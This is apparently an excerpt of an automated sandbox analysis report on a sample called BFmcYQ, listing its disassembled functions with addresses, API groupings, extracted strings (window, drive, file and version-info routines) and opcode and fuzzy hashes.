                                                                                          • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                                          • Instruction ID: 97a2e974d3a8103a9cd9a45e33fc76591e555f2f8e016fda1725ea58560a3fa2
                                                                                          • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                                                          • Instruction Fuzzy Hash: 4DA1C462F0CA02C6EB14BB61D8586BD6761BB4DB64F804635DEAE13BE4EF3CD4448360
                                                                                          Function 00007FF74D0B4F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DriveType
                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                          • API String ID: 2907320926-4222207086
                                                                                          • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                          • Instruction ID: 6884fb8c6ddf8cd4b3f119c09d0f4ae006f39f5ed81a7c3a63ea323cc5690b43
                                                                                          • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                                          • Instruction Fuzzy Hash: 0DB19F21B0DA03D0EA55FBA9D44C2BCA361BF41784FE55571D98E07AB9FF2CE9458320
                                                                                          Function 00007FF74D0DECB4 Relevance: 39.2, APIs: 26, Instructions: 179windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1996641542-0
                                                                                          • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                                          • Instruction ID: 85f1a3cce95348cf3ff7c2330b97e622983e645f7e54ef7a22c03116a218a256
                                                                                          • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                                                          • Instruction Fuzzy Hash: 58717E36A0CA45C6E624BB11E85877EB361FB8DBA0F804635DDAE43BA4EF3CD4448710
                                                                                          Function 00007FF74D0D6EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                          • String ID: tooltips_class32
                                                                                          • API String ID: 698492251-1918224756
                                                                                          • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                          • Instruction ID: 2e858b44e1864c667790c3c5617ac73468c318645ee4656c0364bc5dcb5636a8
                                                                                          • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                                          • Instruction Fuzzy Hash: 78C14132A0CB45CAE714EF65E4542ADB7A0FB88B94F900436DA9E47B64EF7CE451CB10
                                                                                          Function 00007FF74D0A2C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                          • String ID: @
                                                                                          • API String ID: 3869813825-2766056989
                                                                                          • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                          • Instruction ID: 2155807acdf7f5c367da5490251f67728e69a67eea1d72d4cfc6d24b2768951e
                                                                                          • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                                          • Instruction Fuzzy Hash: C5816B32A0CA46CAE750EF75D95866D73A0FB48B88F805531CE8E97768EF38D845C720
                                                                                          Function 00007FF74D032620 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$LongWindow$ModeObjectStockText
                                                                                          • String ID:
                                                                                          • API String ID: 554392163-0
                                                                                          • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                          • Instruction ID: 6e69c500959ad6d800f18a19072e1a9b8173547475184dfda560715a511faa1b
                                                                                          • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                          • Instruction Fuzzy Hash: D281B225E0C957C2EA70BB29954C2B9A392AF89764FD50235C9DD076F4FE3CA8428720
                                                                                          Function 00007FF74D0AC81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                          • API String ID: 222038402-1459072770
                                                                                          • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                                          • Instruction ID: 8340558abdb3cbfe7928968b84e780d9f702b857726b54e04b5ef63feba1f08a
                                                                                          • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                                                          • Instruction Fuzzy Hash: 1E518225B0C642C2EA14FB26A5151B9A391AF85FD0FC24531ED8D47BA6EF7CE501C734
                                                                                          Function 00007FF74D0D6608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                          • API String ID: 3974292440-4258414348
                                                                                          • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                          • Instruction ID: a06a3193399045c2e3876dd66760d202fbceab08e18522d7c6fb746b6a2dd196
                                                                                          • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                          • Instruction Fuzzy Hash: E012D012B1C657C2EE20FB6988211BDE7A0AF54B94BD94632DE9D477A1FE3CE4418330
                                                                                          Function 00007FF74D0E1254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                          • API String ID: 2091158083-3440237614
                                                                                          • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                          • Instruction ID: 1478199302ed94deabf2e427f6a5fac8ea1ddd6256d401c0241f5cda31273a23
                                                                                          • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                          • Instruction Fuzzy Hash: A7715E3261CA86D6E710FB15E8587EDA760FB84794F800132EE8D07AA9EFBCD145C750
                                                                                          Function 00007FF74D0B3FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: SendString$BuffCharDriveLowerType
                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                          • API String ID: 1600147383-4113822522
                                                                                          • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                          • Instruction ID: 0d25bb7a85b890eabef3c15a52684222043895c6be4edac96484add40632bd64
                                                                                          • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                          • Instruction Fuzzy Hash: 52817D22B1CA12C5EB10BBA5D8552BCA3A1FB54B88FD44531CF8D47AA5EF7CE945C320
                                                                                          Function 00007FF74D0E0118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                          • String ID: .dll$.exe$.icl
                                                                                          • API String ID: 258715311-1154884017
                                                                                          • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                          • Instruction ID: e6e1bee4406bbba04994b0f5a0a2b618be34f3fe6ec6bb99c119033b54b9998f
                                                                                          • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                          • Instruction Fuzzy Hash: C7718F32B0CA56C2EB64FB21D4546B9A3A4FB48B98F840635ED9D47BA5EF3DD4448320
                                                                                          Function 00007FF74D0E03D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3840717409-0
                                                                                          • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                          • Instruction ID: ac08fdf3286a188dde1ef86a6a1690d97a6e402687a4f28266efe9ff0224382f
                                                                                          • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                          • Instruction Fuzzy Hash: E1516536B0CB59C6EB14EF62E818A6973A0FB88B94B904535DE9E03B64EF3DD405C710
                                                                                          Function 00007FF74D0B0D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                          • API String ID: 2610073882-3931177956
                                                                                          • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                                          • Instruction ID: 0801464d0848c49430bf6519137d40bee2e54c5f89536979ed5e2278627e47b7
                                                                                          • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                                                          • Instruction Fuzzy Hash: 0D025F32A0DA42C5E758FBA5D15437CA7A1FF45B80F894535CA8E07AA8FF2DE950C321
                                                                                          Function 00007FF74D0B246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                          • String ID: aut
                                                                                          • API String ID: 130057722-3010740371
                                                                                          • Opcode ID: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                                                          • Instruction ID: 43809e2280904773eb88abc8d7b4118de638f1083b498a3f9acc4ae6c0919da7
                                                                                          • Opcode Fuzzy Hash: 9e3bb30c6d43dfc108f49b63acd44aa3cfb888b98a274a36fddad15c1dafbe64
                                                                                          • Instruction Fuzzy Hash: 80C1543261CA86D6EB20FF65E8506E9A750FB85788FC04136EA8D47B69EF7CD205C710
                                                                                          Function 00007FF74D0DE40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                          • String ID: tooltips_class32
                                                                                          • API String ID: 2443926738-1918224756
                                                                                          • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                          • Instruction ID: 27d893e93c3fdffb6b29c245ff62188d1ac934121ee7a9ab1a1f622210c6d6a4
                                                                                          • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                          • Instruction Fuzzy Hash: 18915D32A1DA89C6E750EF65E4547AD77A1EB88B84F904136DE8D07B68EF3CD045C720
                                                                                          Function 00007FF74D0B8BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1111067124-438819550
                                                                                          • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                          • Instruction ID: f188e8514619a066c5c13101747f5f45c1ec7eb09cfcd24d09080d4a7235dc1e
                                                                                          • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                          • Instruction Fuzzy Hash: 6A715E3261CB86D6DB20FF12D8442BAA361FB84B88F805032DA8D47B76EF79E545C750
                                                                                          Function 00007FF74D0C4F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                          • String ID:
                                                                                          • API String ID: 2598888154-3916222277
                                                                                          • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                                          • Instruction ID: 62824cd4bfd5d8d30183c0ee42f0ff47c85492b40760dc5ca381898d15697ed8
                                                                                          • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                                                          • Instruction Fuzzy Hash: 8E516876B18640CFE754EF65E44869DB7B1F748B88F408529EE8953B28DF38E415CB10
